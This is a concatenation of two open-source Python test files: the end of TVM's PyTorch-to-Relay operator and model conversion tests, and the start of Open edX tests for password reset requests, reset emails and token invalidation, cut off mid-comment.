class Topk4(Module):
def forward(self, *args):
return torch.topk(args[0], k=3, largest=True)
class Topk5(Module):
def forward(self, *args):
return torch.topk(args[0], k=3, largest=False)
class Topk6(Module):
def forward(self, *args):
return torch.topk(args[0], k=3, sorted=True)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(Topk1().float().eval(), input_data=input_data)
verify_model(Topk2().float().eval(), input_data=input_data)
verify_model(Topk3().float().eval(), input_data=input_data)
verify_model(Topk4().float().eval(), input_data=input_data)
verify_model(Topk5().float().eval(), input_data=input_data)
verify_model(Topk6().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_logical_not():
torch.set_grad_enabled(False)
class LogicalNot1(Module):
def forward(self, *args):
return torch.logical_not(args[0])
input_data = torch.tensor([True, False])
verify_model(LogicalNot1().float().eval(), input_data=input_data)
input_data = torch.tensor([0, 1, -10], dtype=torch.int8)
verify_model(LogicalNot1().float().eval(), input_data=input_data)
input_data = torch.tensor([0.0, 1.5, -10.0], dtype=torch.double)
verify_model(LogicalNot1().float().eval(), input_data=input_data)
input_data = torch.tensor([0.0, 1.0, -10.0], dtype=torch.int32)
verify_model(LogicalNot1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_bitwise_not():
torch.set_grad_enabled(False)
class BitwiseNot1(Module):
def forward(self, *args):
return torch.bitwise_not(args[0])
input_data = torch.tensor([0, 1, -10], dtype=torch.int8)
verify_model(BitwiseNot1().float().eval(), input_data=input_data)
input_data = torch.tensor([0.0, 1.0, -10.0], dtype=torch.int32)
verify_model(BitwiseNot1().float().eval(), input_data=input_data)
input_data = torch.tensor([True, False])
verify_model(BitwiseNot1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_bitwise_xor():
torch.set_grad_enabled(False)
class BitwiseXor1(Module):
def forward(self, *args):
return torch.bitwise_xor(args[0], args[1])
class BitwiseXor2(Module):
def forward(self, *args):
rhs = torch.tensor([1, 0, 3], dtype=torch.int8)
if torch.cuda.is_available():
rhs = rhs.cuda()
return torch.bitwise_xor(args[0], rhs)
lhs = torch.tensor([-1, -2, 3], dtype=torch.int8)
rhs = torch.tensor([1, 0, 3], dtype=torch.int8)
verify_model(BitwiseXor1().float().eval(), input_data=[lhs, rhs])
lhs = torch.tensor([True, True, False])
rhs = torch.tensor([False, True, False])
verify_model(BitwiseXor1().float().eval(), input_data=[lhs, rhs])
lhs = torch.tensor([-1, -2, 3], dtype=torch.int8)
verify_model(BitwiseXor2().float().eval(), input_data=[lhs])
@tvm.testing.uses_gpu
def test_forward_logical_xor():
torch.set_grad_enabled(False)
class LogicalXor1(Module):
def forward(self, *args):
return torch.logical_xor(args[0], args[1])
class LogicalXor2(Module):
def forward(self, *args):
rhs = torch.tensor([1, 0, 3], dtype=torch.int8)
if torch.cuda.is_available():
rhs = rhs.cuda()
return torch.logical_xor(args[0], rhs)
lhs = torch.tensor([-1, -2, 3], dtype=torch.int8)
rhs = torch.tensor([1, 0, 3], dtype=torch.int8)
verify_model(LogicalXor1().float().eval(), input_data=[lhs, rhs])
lhs = torch.tensor([True, True, False])
rhs = torch.tensor([False, True, False])
verify_model(LogicalXor1().float().eval(), input_data=[lhs, rhs])
lhs = torch.tensor([-1, -2, 3], dtype=torch.int8)
verify_model(LogicalXor2().float().eval(), input_data=[lhs])
@tvm.testing.uses_gpu
def test_forward_unary():
torch.set_grad_enabled(False)
class Sqrt1(Module):
def forward(self, *args):
return torch.sqrt(args[0])
class RSqrt1(Module):
def forward(self, *args):
return torch.rsqrt(args[0])
class Ceil1(Module):
def forward(self, *args):
return torch.ceil(args[0])
class Floor1(Module):
def forward(self, *args):
return torch.floor(args[0])
class Round1(Module):
def forward(self, *args):
return torch.round(args[0])
class Cos1(Module):
def forward(self, *args):
return torch.cos(args[0])
class Sin1(Module):
def forward(self, *args):
return torch.sin(args[0])
class Tan1(Module):
def forward(self, *args):
return torch.tan(args[0])
class Tanh1(Module):
def forward(self, *args):
return torch.tanh(args[0])
class Acos1(Module):
def forward(self, *args):
return torch.acos(args[0])
class Asin1(Module):
def forward(self, *args):
return torch.asin(args[0])
class Atan1(Module):
def forward(self, *args):
return torch.atan(args[0])
class Log1(Module):
def forward(self, *args):
return torch.log(args[0])
class Exp1(Module):
def forward(self, *args):
return torch.exp(args[0])
class Erf1(Module):
def forward(self, *args):
return torch.erf(args[0])
class Trunc1(Module):
def forward(self, *args):
return torch.trunc(args[0])
class Sign1(Module):
def forward(self, *args):
return torch.sign(args[0])
class Neg1(Module):
def forward(self, *args):
return torch.neg(args[0])
class Sinh1(Module):
def forward(self, *args):
return torch.sinh(args[0])
class Cosh1(Module):
def forward(self, *args):
return torch.cosh(args[0])
class Log2_1(Module):
def forward(self, *args):
return torch.log2(args[0])
class Log10_1(Module):
def forward(self, *args):
return torch.log10(args[0])
class Log1p_1(Module):
def forward(self, *args):
return torch.log1p(args[0])
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(Sqrt1().float().eval(), input_data=input_data)
verify_model(RSqrt1().float().eval(), input_data=input_data)
verify_model(Ceil1().float().eval(), input_data=input_data)
verify_model(Floor1().float().eval(), input_data=input_data)
verify_model(Round1().float().eval(), input_data=input_data)
verify_model(Cos1().float().eval(), input_data=input_data)
verify_model(Cosh1().float().eval(), input_data=input_data)
verify_model(Sin1().float().eval(), input_data=input_data)
verify_model(Sinh1().float().eval(), input_data=input_data)
verify_model(Tan1().float().eval(), input_data=input_data)
verify_model(Tanh1().float().eval(), input_data=input_data)
verify_model(Acos1().float().eval(), input_data=input_data)
verify_model(Asin1().float().eval(), input_data=input_data)
verify_model(Atan1().float().eval(), input_data=input_data)
verify_model(Log1().float().eval(), input_data=input_data)
verify_model(Log2_1().float().eval(), input_data=input_data)
verify_model(Log10_1().float().eval(), input_data=input_data)
verify_model(Log1p_1().float().eval(), input_data=input_data)
verify_model(Exp1().float().eval(), input_data=input_data)
verify_model(Erf1().float().eval(), input_data=input_data)
verify_model(Trunc1().float().eval(), input_data=input_data)
verify_model(Sign1().float().eval(), input_data=input_data)
verify_model(Neg1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_where():
torch.set_grad_enabled(False)
class Where1(Module):
def forward(self, *args):
y = torch.ones([3, 2])
if torch.cuda.is_available():
y = y.cuda()
return torch.where(args[0] > 0, args[0], y)
class Where2(Module):
def forward(self, *args):
return torch.where(args[0] > 0, args[0], args[1])
class Where3(Module):
def forward(self, *args):
return torch.where(args[0])[0]
x = torch.rand([3, 2]).float()
verify_model(Where1(), input_data=[x])
y = torch.rand([3, 2])
verify_model(Where2(), input_data=[x, y])
# a single argument variant, equivalent to torch.nonzero(..., as_tuple=True)
inp = torch.rand([10])
inp[3:8] = 0
verify_trace_model(Where3(), [inp], ["llvm"])
@tvm.testing.uses_gpu
def test_forward_addcdiv():
torch.set_grad_enabled(False)
class Addcdiv1(Module):
def forward(self, *args):
t1 = torch.ones([3, 1])
t2 = torch.ones([1, 3])
if torch.cuda.is_available():
t1 = t1.cuda()
t2 = t2.cuda()
return torch.addcdiv(args[0], 0.1, t1, t2)
class Addcdiv2(Module):
def forward(self, *args):
return torch.addcdiv(args[0], 0.5, args[1], args[2])
input_data = torch.rand([1, 3]).float()
verify_model(Addcdiv1().float().eval(), input_data=input_data)
t1 = torch.rand([3, 1]).float()
t2 = torch.rand([1, 3]).float()
verify_model(Addcdiv2().float().eval(), input_data=[input_data, t1, t2])
@tvm.testing.uses_gpu
def test_forward_addcmul():
torch.set_grad_enabled(False)
class Addcmul1(Module):
def forward(self, *args):
t1 = torch.ones([3, 1])
t2 = torch.ones([1, 3])
if torch.cuda.is_available():
t1 = t1.cuda()
t2 = t2.cuda()
return torch.addcmul(args[0], 0.1, t1, t2)
class Addcmul2(Module):
def forward(self, *args):
return torch.addcmul(args[0], 0.5, args[1], args[2])
input_data = torch.rand([1, 3]).float()
verify_model(Addcmul1().float().eval(), input_data=input_data)
t1 = torch.rand([3, 1]).float()
t2 = torch.rand([1, 3]).float()
verify_model(Addcmul2().float().eval(), input_data=[input_data, t1, t2])
@tvm.testing.uses_gpu
def test_forward_true_divide():
if package_version.parse(torch.__version__) < package_version.parse("1.5.0"):
return
torch.set_grad_enabled(False)
class TrueDivide(Module):
def forward(self, *args):
return torch.true_divide(args[0], args[1])
dividend = torch.rand([5, 3]).float()
# divisor could be either tensor or scalar
divisor_tensor = torch.rand([5, 3]).float() + 0.5
divisor_scalar = torch.tensor(1.0, dtype=torch.float32)
verify_model(
TrueDivide().float().eval(), input_data=[dividend, divisor_tensor], atol=1e-4, rtol=1e-4
)
verify_model(
TrueDivide().float().eval(), input_data=[dividend, divisor_scalar], atol=1e-4, rtol=1e-4
)
@tvm.testing.uses_gpu
def test_forward_traced_function():
def fn(t1, t2):
return t1 + t2
tensor1 = torch.randn(3, 4)
tensor2 = torch.randn(3, 4)
verify_model(fn, input_data=[tensor1, tensor2])
@tvm.testing.uses_gpu
def test_forward_dtypes():
def fn(t1, t2):
return 2.5 * t1 + t2
for dt in [torch.int32, torch.int64, torch.double]:
tensor1 = torch.randn(3, 4).to(dtype=dt)
tensor2 = torch.randn(3, 4).to(dtype=dt)
verify_model(fn, input_data=[tensor1, tensor2])
class ModuleWithIntParameters(Module):
def __init__(self, arr):
super().__init__()
self.param = torch.nn.Parameter(torch.LongTensor(arr), requires_grad=False)
def forward(self, x):
return x.long() + self.param
shape = (10, 10)
param = torch.ones(shape, dtype=torch.long)
inp = torch.ones(shape, dtype=torch.int)
verify_model(ModuleWithIntParameters(param), input_data=inp)
@tvm.testing.uses_gpu
def test_weight_names():
tm = torch.jit.trace(torch.nn.Linear(3, 4), [torch.randn(2, 3)])
mod, params = relay.frontend.from_pytorch(tm, [("input", (2, 3))])
assert set(params.keys()) == set(n for n, p in tm.named_parameters())
@tvm.testing.uses_gpu
def test_duplicate_weight_use():
# The test cases doesn't make any sense as a neural network,
# the issue popped up in shared input/output embeddings of bert,
# but this is quicker
class Test(Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(5, 3)
def forward(self, x):
x = self.lin(x)
x = x @ self.lin.weight
return x
verify_model(Test(), input_data=[torch.randn(5, 5)])
@tvm.testing.uses_gpu
def test_forward_matmul():
torch.set_grad_enabled(False)
class MatMul1(Module):
def forward(self, *args):
return torch.matmul(args[0], args[1])
# matrix x vector
tensor1 = torch.randn(3, 4)
tensor2 = torch.randn(4)
verify_model(MatMul1().float().eval(), input_data=[tensor1, tensor2])
# matrix x matrix
tensor1 = torch.randn(10, 4)
tensor2 = torch.randn(4, 10)
verify_model(MatMul1().float().eval(), input_data=[tensor1, tensor2])
# batched matrix x batched matrix
tensor1 = torch.randn(10, 3, 4)
tensor2 = torch.randn(10, 4, 5)
verify_model(MatMul1().float().eval(), input_data=[tensor1, tensor2])
# batched matrix x broadcasted matrix
tensor1 = torch.randn(10, 3, 4)
tensor2 = torch.randn(4, 5)
verify_model(MatMul1().float().eval(), input_data=[tensor1, tensor2])
# batched matrix x batched matrix
tensor1 = torch.randn(1, 12, 14, 64)
tensor2 = torch.randn(1, 12, 64, 14)
verify_model(MatMul1().float().eval(), input_data=[tensor1, tensor2])
def test_forward_index():
torch.set_grad_enabled(False)
input_shape = [3, 4, 5, 6]
class Index0(Module):
def forward(self, x):
return x[[0, 1], [0, 2], :2, 4]
input_data = torch.rand(input_shape).float()
verify_model(Index0().eval(), input_data=input_data)
class Index1(Module):
def forward(self, x):
return x[[0], [1, 2, 3, 0], [3, 1, 2, 2], [4, 2, 1, 0]]
input_data = torch.rand(input_shape).float()
verify_model(Index1().eval(), input_data=input_data)
def test_logsumexp():
class Logsumexp(Module):
def __init__(self, dim, keepdim=False):
super().__init__()
self.dim = dim
self.keepdim = keepdim
def forward(self, x):
return torch.logsumexp(x, self.dim, self.keepdim)
input_shape = (100, 100)
input_data = torch.rand(input_shape)
verify_model(Logsumexp(0), input_data=input_data)
verify_model(Logsumexp(0, keepdim=True), input_data=input_data)
# Also test on double
verify_model(Logsumexp(1, keepdim=True), input_data=input_data.double())
def test_stack():
class Stack(torch.nn.Module):
def __init__(self, axis=0):
super().__init__()
self.axis = axis
def forward(self, x):
return torch.stack((x, x), dim=self.axis)
inp = torch.randn(8, 8, 8)
verify_model(Stack(), input_data=inp)
verify_model(Stack(axis=-1), input_data=inp)
verify_model(Stack(axis=3), input_data=inp)
verify_model(Stack(axis=-4), input_data=inp)
def test_stack_dynamic():
class Stack(torch.nn.Module):
def forward(self, x):
tensor_list = []
for i in range(x.size(0)):
# this is a workaround to avoid generating impure aten::append op
tensor_list += [x[i]]
# relay tensor array only supports stacking on the first axis
return torch.stack(tensor_list, dim=0)
verify_script_model(Stack(), [(8, 8, 8)], _get_default_vm_targets())
def test_forward_unbind():
class Unbind(torch.nn.Module):
def __init__(self, axis=0):
super().__init__()
self.axis = axis
def forward(self, x):
return torch.unbind(x, self.axis)
inp = torch.randn(8, 8, 8)
verify_model(Unbind(0), input_data=inp)
verify_model(Unbind(1), input_data=inp)
verify_model(Unbind(2), input_data=inp)
def test_forward_nonzero():
class Nonzero(Module):
def __init__(self, as_tuple=False):
super().__init__()
self.as_tuple = as_tuple
def forward(self, data):
return torch.nonzero(data, as_tuple=self.as_tuple)
inp = torch.Tensor(np.array([[0, 1, 0], [2, 0, 9], [-1, -1, 0]]).astype("float32"))
verify_trace_model(Nonzero(), [inp], ["llvm"])
def test_forward_scatter():
class Scatter(Module):
def __init__(self, dim=0):
super().__init__()
self.dim = dim
def forward(self, data, index, src):
return torch.scatter(data, dim=self.dim, index=index, src=src)
in_data = torch.zeros(3, 5)
in_index = torch.tensor([[0, 1, 2, 0, 0], [2, 0, 0, 1, 2]])
in_src = torch.rand(2, 5)
# TODO: add scatter gpu schedule to enable gpu test.
verify_trace_model(Scatter(), [in_data, in_index, in_src], ["llvm"])
in_data = torch.zeros(2, 4)
in_index = torch.tensor([[2], [3]])
in_src = torch.rand(2, 1)
# TODO: add scatter gpu schedule to enable gpu test.
verify_trace_model(Scatter(1), [in_data, in_index, in_src], ["llvm"])
def test_numel():
class Numel(Module):
def forward(self, data):
return torch.tensor(torch.numel(data))
targets = _get_default_vm_targets()
verify_script_model(Numel(), [(1,)], targets)
verify_script_model(Numel(), [(3, 5)], targets)
verify_script_model(Numel(), [(3, 5, 8)], targets)
def test_forward_pretrained_bert_base_uncased():
######################################################################
# This is an example how to run BERT models using TVM
# ---------------------------------------------------
"""
Refer the bert example given in https://pypi.org/project/pytorch-pretrained-bert
# To get started, pretrained bert package needs to be installed as prerequisite.
.. code-block:: bash
# install bert package
pip install pytorch_pretrained_bert==0.6.2 --user
"""
try:
from pytorch_pretrained_bert import BertTokenizer, BertForMaskedLM
except:
print("Torch pretrained bert package must be installed to run this script.")
return
######################################################################
# Load the tokenizer and tokenize the input
# -----------------------------------------
# Load pre-trained model tokenizer (vocabulary)
tokenizer = BertTokenizer.from_pretrained("bert-base-uncased")
# Tokenized input
text = "[CLS] Who was Jim Henson ? [SEP] Jim Henson was a puppeteer [SEP]"
tokenized_text = tokenizer.tokenize(text)
# Mask a token that we will try to predict back with `BertForMaskedLM`
masked_index = 8
tokenized_text[masked_index] = "[MASK]"
assert tokenized_text == [
"[CLS]",
"who",
"was",
"jim",
"henson",
"?",
"[SEP]",
"jim",
"[MASK]",
"was",
"a",
"puppet",
"##eer",
"[SEP]",
]
# Convert token to vocabulary indices
indexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)
# Define sentence A and B indices associated to 1st and 2nd sentences (see paper)
segments_ids = [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1]
# Convert inputs to PyTorch tensors
tokens_tensor = torch.tensor([indexed_tokens])
segments_tensors = torch.tensor([segments_ids])
######################################################################
# Load a pretrained PyTorch model bert-base-uncased
# -------------------------------------------------
# Bert Model with a language modeling
model = BertForMaskedLM.from_pretrained("bert-base-uncased")
model.eval()
######################################################################
# Predict all tokens with pytorch
# -------------------------------
with torch.no_grad():
torch_preds = model(tokens_tensor, segments_tensors)
######################################################################
# Make TorchScripted model via jit trace
# --------------------------------------
scripted_model = torch.jit.trace(model, (tokens_tensor, segments_tensors)).eval()
######################################################################
# Import the graph to Relay
# -------------------------
# Convert PyTorch graph to Relay graph. The input name can be arbitrary.
input_1 = "input_ids"
input_2 = "input.2"
shape_list = [(input_1, list(tokens_tensor.shape)), (input_2, list(segments_tensors.shape))]
mod, params = relay.frontend.from_pytorch(scripted_model, shape_list)
######################################################################
# Compile the model with relay
# ----------------------------
target = "llvm"
with tvm.transform.PassContext(opt_level=3):
relay_graph, relay_lib, relay_params = relay.build(mod, target=target, params=params)
######################################################################
# Execute on TVM
# --------------
ctx = tvm.context(target, 0)
relay_model = graph_runtime.create(relay_graph, relay_lib, ctx)
relay_model.set_input(**relay_params)
relay_model.set_input(input_1, tokens_tensor)
relay_model.set_input(input_2, segments_tensors)
relay_model.run()
compiled_output = relay_model.get_output(0).asnumpy()
######################################################################
# Validate the outputs
# --------------------
# Compare the torch and tvm outputs
tvm.testing.assert_allclose(torch_preds, compiled_output, rtol=1e-3, atol=1e-3)
######################################################################
# Process the output
# ------------------
# Process the model output to token.
# Torch output to token
torch_pred_idx = torch.argmax(torch_preds[0, masked_index]).item()
torch_pred_token = tokenizer.convert_ids_to_tokens([torch_pred_idx])[0]
# TVM output to token
tvm_pred_idx = compiled_output[0, masked_index].argmax()
tvm_pred_token = tokenizer.convert_ids_to_tokens([tvm_pred_idx])[0]
assert torch_pred_idx == tvm_pred_idx
assert torch_pred_token == tvm_pred_token
# Print the outputs
print("Torch top-1 id: {}, token: {}".format(torch_pred_idx, torch_pred_token))
print("TVM top-1 id: {}, token: {}".format(tvm_pred_idx, tvm_pred_token))
def test_convert_torch_script_with_input_types():
def model_fn(x, y):
x = x.to(dtype=torch.int32)
y = x + y
return y
ishape = (4, 5)
input_x = torch.rand(ishape, dtype=torch.float32)
input_y = torch.randint(low=0, high=100, size=ishape, dtype=torch.int32)
inputs = [input_x, input_y]
script_module = torch.jit.trace(model_fn, inputs)
fname = "tmp.pt"
torch.jit.save(script_module, fname)
loaded = torch.jit.load(fname)
os.remove(fname)
verify_model(loaded.eval(), input_data=inputs)
def expected(x_shape, y_shape):
# use a fixed order of args so alpha equal check can pass
x = relay.var("x", shape=x_shape, dtype="float32")
y = relay.var("y", shape=y_shape, dtype="int32")
args = [x, y]
x1 = relay.cast(x, "int32")
y1 = relay.add(x1, y)
mod = tvm.IRModule.from_expr(relay.Function(args, y1))
return mod["main"]
input_infos = [("input0", (ishape, "float")), ("input1", (ishape, "int"))]
mod, params = relay.frontend.from_pytorch(loaded, input_infos)
expected_mod = expected(ishape, ishape)
assert tvm.ir.structural_equal(expected_mod, mod["main"], map_free_vars=True)
if __name__ == "__main__":
# some structural tests
test_forward_traced_function()
test_forward_dtypes()
test_weight_names()
test_duplicate_weight_use()
# Single operator tests
test_forward_pixel_shuffle()
test_forward_add()
test_forward_subtract()
test_forward_multiply()
test_forward_matmul()
test_forward_rsub()
test_forward_onehot()
test_forward_embedding()
test_forward_reshape()
test_forward_reciprocal()
test_forward_repeat()
test_forward_repeat_interleave()
test_forward_squeeze()
test_forward_unsqueeze()
test_forward_concatenate()
test_forward_reduce_sum()
test_forward_reduce_prod()
test_forward_argmin()
test_forward_argmax()
test_forward_norm()
test_forward_frobenius_norm()
test_forward_std()
test_forward_variance()
test_forward_relu()
test_forward_prelu()
test_forward_leakyrelu()
test_forward_elu()
test_forward_celu()
test_forward_gelu()
test_forward_selu()
test_forward_log_sigmoid()
test_forward_adaptiveavgpool()
test_forward_maxpool2d()
test_forward_maxpool1d()
test_forward_maxpool3d()
test_forward_hardtanh()
test_forward_conv()
test_forward_conv_transpose()
test_forward_threshold()
test_forward_contiguous()
test_forward_batchnorm()
test_forward_instancenorm()
test_forward_layernorm()
test_forward_groupnorm()
test_forward_transpose()
test_forward_size()
test_forward_view()
test_forward_select()
test_forward_take()
test_forward_topk()
test_forward_where()
test_forward_addcdiv()
test_forward_addcmul()
test_forward_true_divide()
test_forward_clone()
test_forward_softplus()
test_forward_softsign()
test_forward_logsoftmax()
test_forward_sigmoid()
test_forward_dense()
test_forward_avgpool()
test_forward_avgpool3d()
test_forward_dropout()
test_forward_slice()
test_forward_mean()
test_forward_expand()
test_forward_pow()
test_forward_unary()
test_forward_clamp()
test_forward_clamp_()
test_forward_logical_not()
test_forward_bitwise_not()
test_forward_bitwise_xor()
test_forward_logical_xor()
test_forward_isfinite()
test_forward_isnan()
test_forward_isinf()
test_forward_ones()
test_forward_ones_like()
test_forward_zeros()
test_forward_zeros_like()
test_forward_full()
test_forward_full_like()
test_forward_linspace()
test_forward_arange()
test_forward_mesh_grid()
test_forward_chunk()
test_forward_split()
test_forward_gather()
test_upsample()
test_forward_upsample3d()
test_forward_nms()
test_forward_roi_align()
test_to()
test_flatten()
test_type_as()
test_forward_functional_pad()
test_forward_zero_pad2d()
test_forward_constant_pad1d()
test_forward_constant_pad2d()
test_forward_constant_pad3d()
test_forward_reflection_pad1d()
test_forward_reflection_pad2d()
test_forward_replication_pad1d()
test_forward_replication_pad2d()
test_forward_replication_pad3d()
test_adaptive_pool3d()
test_conv3d()
test_conv3d_transpose()
test_forward_index()
test_min_max()
test_logsumexp()
test_stack()
test_stack_dynamic()
test_forward_unbind()
test_forward_nonzero()
test_forward_scatter()
test_numel()
# Model tests
test_resnet18()
test_squeezenet1_0()
test_squeezenet1_1()
test_densenet121()
# disable inception test for now, since loading it takes ~5min on torchvision-0.5 due to scipy bug
# See https://discuss.pytorch.org/t/torchvisions-inception-v3-takes-much-longer-to-load-than-other-models/68756
# test_inception_v3()
test_googlenet()
test_mnasnet0_5()
test_mobilenet_v2()
test_custom_conversion_map()
test_segmentaton_models()
test_3d_models()
# Quantization test
from qnn_test import test_quantized_imagenet, test_quantized_modules
test_quantized_modules()
test_quantized_imagenet()
# Test simple conditionals and loop
test_control_flow()
test_simple_rnn()
# More complex recurrent models
from test_lstm import test_custom_lstm
test_custom_lstm()
# Test bert model
test_forward_pretrained_bert_base_uncased()
# Test convert torch script(jit) with specific inputs' types
test_convert_torch_script_with_input_types()
| sxjscience/tvm | tests/python/frontend/pytorch/test_forward.py | Python | apache-2.0 | 113,518 | [
"VisIt"
] | 6be4db87a52e0be62f1e25322e17a1dfc219c93accb921b1c271b3f9329c3566 |
# -*- coding: utf-8 -*-
"""
Tests for user authorization password-related functionality.
"""
import json
import logging
import re
import ddt
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core import mail
from django.test import TestCase
from django.test.client import RequestFactory
from django.urls import reverse
from mock import Mock, patch
from oauth2_provider.models import AccessToken as dot_access_token
from oauth2_provider.models import RefreshToken as dot_refresh_token
from testfixtures import LogCapture
from openedx.core.djangoapps.oauth_dispatch.tests import factories as dot_factories
from openedx.core.djangoapps.site_configuration.tests.factories import SiteFactory
from openedx.core.djangoapps.user_api.accounts.tests.test_api import CreateAccountMixin
from openedx.core.djangoapps.user_api.errors import UserAPIInternalError, UserNotFound
from openedx.core.djangoapps.user_authn.views.password_reset import request_password_change
from openedx.core.djangolib.testing.utils import CacheIsolationTestCase, skip_unless_lms
LOGGER_NAME = 'audit'
User = get_user_model() # pylint:disable=invalid-name
class TestRequestPasswordChange(CreateAccountMixin, TestCase):
"""
Tests for users who request a password change.
"""
USERNAME = u'claire-underwood'
PASSWORD = u'ṕáśśẃőŕd'
EMAIL = u'claire+underwood@example.com'
IS_SECURE = False
@skip_unless_lms
def test_request_password_change(self):
# Create and activate an account
self.create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
self.assertEqual(len(mail.outbox), 1)
request = RequestFactory().post('/password')
request.user = Mock()
request.site = SiteFactory()
with patch('crum.get_current_request', return_value=request):
# Request a password change
request_password_change(self.EMAIL, self.IS_SECURE)
# Verify that a new email message has been sent
self.assertEqual(len(mail.outbox), 2)
# Verify that the body of the message contains something that looks
# like an activation link
email_body = mail.outbox[0].body
result = re.search(r'(?P<url>https?://[^\s]+)', email_body)
self.assertIsNot(result, None)
@skip_unless_lms
def test_request_password_change_invalid_user(self):
with self.assertRaises(UserNotFound):
request_password_change(self.EMAIL, self.IS_SECURE)
# Verify that no email messages have been sent
self.assertEqual(len(mail.outbox), 0)
@skip_unless_lms
def test_request_password_change_inactive_user(self):
# Create an account, but do not activate it
self.create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
self.assertEqual(len(mail.outbox), 1)
request = RequestFactory().post('/password')
request.user = Mock()
request.site = SiteFactory()
with patch('crum.get_current_request', return_value=request):
request_password_change(self.EMAIL, self.IS_SECURE)
# Verify that the password change email was still sent
self.assertEqual(len(mail.outbox), 2)
@skip_unless_lms
@ddt.ddt
class TestPasswordChange(CreateAccountMixin, CacheIsolationTestCase):
""" Tests for views that change the user's password. """
USERNAME = u"heisenberg"
ALTERNATE_USERNAME = u"walt"
OLD_PASSWORD = u"ḅḷüëṡḳÿ"
NEW_PASSWORD = u"B🄸🄶B🄻🅄🄴"
OLD_EMAIL = u"walter@graymattertech.com"
NEW_EMAIL = u"walt@savewalterwhite.com"
INVALID_KEY = u"123abc"
ENABLED_CACHES = ['default']
def setUp(self):
super(TestPasswordChange, self).setUp()
self.create_account(self.USERNAME, self.OLD_PASSWORD, self.OLD_EMAIL)
result = self.client.login(username=self.USERNAME, password=self.OLD_PASSWORD)
self.assertTrue(result)
mail.outbox = []
def test_password_change(self):
# Request a password change while logged in, simulating
# use of the password reset link from the account page
response = self._change_password()
self.assertEqual(response.status_code, 200)
# Check that an email was sent
self.assertEqual(len(mail.outbox), 1)
# Retrieve the activation link from the email body
email_body = mail.outbox[0].body
result = re.search(r'(?P<url>https?://[^\s]+)', email_body)
self.assertIsNot(result, None)
activation_link = result.group('url')
# Visit the activation link
response = self.client.get(activation_link)
self.assertEqual(response.status_code, 200)
# Submit a new password and follow the redirect to the success page
response = self.client.post(
activation_link,
# These keys are from the form on the current password reset confirmation page.
{'new_password1': self.NEW_PASSWORD, 'new_password2': self.NEW_PASSWORD},
follow=True
)
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Your password has been reset.")
# Log the user out to clear session data
self.client.logout()
# Verify that the new password can be used to log in
login_api_url = reverse('login_api')
response = self.client.post(login_api_url, {'email': self.OLD_EMAIL, 'password': self.NEW_PASSWORD})
assert response.status_code == 200
response_dict = json.loads(response.content.decode('utf-8'))
assert response_dict['success']
# Try reusing the activation link to change the password again
# Visit the activation link again.
response = self.client.get(activation_link)
self.assertEqual(response.status_code, 200)
self.assertContains(response, "This password reset link is invalid. It may have been used already.")
self.client.logout()
# Verify that the old password cannot be used to log in
result = self.client.login(username=self.USERNAME, password=self.OLD_PASSWORD)
self.assertFalse(result)
# Verify that the new password continues to be valid
response = self.client.post(login_api_url, {'email': self.OLD_EMAIL, 'password': self.NEW_PASSWORD})
assert response.status_code == 200
response_dict = json.loads(response.content.decode('utf-8'))
assert response_dict['success']
def test_password_change_failure(self):
with patch(
'openedx.core.djangoapps.user_authn.views.password_reset.request_password_change',
side_effect=UserAPIInternalError,
):
self._change_password()
self.assertRaises(UserAPIInternalError)
@patch.dict(settings.FEATURES, {'ENABLE_PASSWORD_RESET_FAILURE_EMAIL': True})
def test_password_reset_failure_email(self):
"""Test that a password reset failure email notification is sent, when enabled."""
# Log the user out
self.client.logout()
bad_email = 'doesnotexist@example.com'
response = self._change_password(email=bad_email)
self.assertEqual(response.status_code, 200)
# Check that an email was sent
self.assertEqual(len(mail.outbox), 1)
# Verify that the body contains the failed password reset message
sent_message = mail.outbox[0]
text_body = sent_message.body
html_body = sent_message.alternatives[0][0]
for email_body in [text_body, html_body]:
msg = u'However, there is currently no user account associated with your email address: {email}'.format(
email=bad_email
)
assert u'reset for your user account at {}'.format(settings.PLATFORM_NAME) in email_body
assert 'password_reset_confirm' not in email_body, 'The link should not be added if user was not found'
assert msg in email_body
@ddt.data(True, False)
def test_password_change_logged_out(self, send_email):
# Log the user out
self.client.logout()
# Request a password change while logged out, simulating
# use of the password reset link from the login page
if send_email:
response = self._change_password(email=self.OLD_EMAIL)
self.assertEqual(response.status_code, 200)
else:
# Don't send an email in the POST data, simulating
# its (potentially accidental) omission in the POST
# data sent from the login page
response = self._change_password()
self.assertEqual(response.status_code, 400)
def test_access_token_invalidation_logged_out(self):
self.client.logout()
user = User.objects.get(email=self.OLD_EMAIL)
self._create_dot_tokens(user)
response = self._change_password(email=self.OLD_EMAIL)
self.assertEqual(response.status_code, 200)
self._assert_access_token_destroyed(user)
def test_access_token_invalidation_logged_in(self):
user = User.objects.get(email=self.OLD_EMAIL)
self._create_dot_tokens(user)
response = self._change_password()
self.assertEqual(response.status_code, 200)
self._assert_access_token_destroyed(user)
def test_password_change_inactive_user(self):
# Log out the user created during test setup
self.client.logout()
# Create a second user, but do not activate it
self.create_account(self.ALTERNATE_USERNAME, self.OLD_PASSWORD, self.NEW_EMAIL)
mail.outbox = []
# Send the view the email address tied to the inactive user
response = self._change_password(email=self.NEW_EMAIL)
# Expect that the activation email is still sent,
# since the user may have lost the original activation email.
self.assertEqual(response.status_code, 200)
self.assertEqual(len(mail.outbox), 1)
def test_password_change_no_user(self):
# Log out the user created during test setup
self.client.logout()
with LogCapture(LOGGER_NAME, level=logging.INFO) as logger:
# Send the view an email address not tied to any user
response = self._change_password(email=self.NEW_EMAIL)
self.assertEqual(response.status_code, 200)
logger.check((LOGGER_NAME, 'INFO', 'Invalid password reset attempt'))
def test_password_change_rate_limited(self):
"""
Tests that consecutive password reset requests are rate limited.
"""
# Log out the user created during test setup, to prevent the view from
# selecting the logged-in user's email address over the email provided
# in the POST data
